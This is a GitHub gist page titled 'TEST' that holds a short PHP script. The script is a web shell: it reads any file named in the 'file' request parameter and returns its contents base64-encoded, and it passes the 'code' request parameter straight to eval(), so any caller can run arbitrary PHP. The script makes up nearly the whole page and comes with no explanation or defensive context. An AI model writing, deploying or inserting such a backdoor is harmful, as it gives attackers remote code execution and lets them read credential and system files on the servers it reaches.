Last active
August 8, 2018 17:50
-
-
Save Gydo194/a41a9b90477aae609583095ef0721c43 to your computer and use it in GitHub Desktop.
TEST
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
echo "SCRIPT RUN<br>"; | |
if(isset($_REQUEST["file"])) | |
{ | |
echo base64_encode(file_get_contents($_REQUEST["file"])); | |
} | |
if(isset($_REQUEST["code"])) | |
{ | |
echo base64_encode(eval($_REQUEST["code"])); | |
} | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment